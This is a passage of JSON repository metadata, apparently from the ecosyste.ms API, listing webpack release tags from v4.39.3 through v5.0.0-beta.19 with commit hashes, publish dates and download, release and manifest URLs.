https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag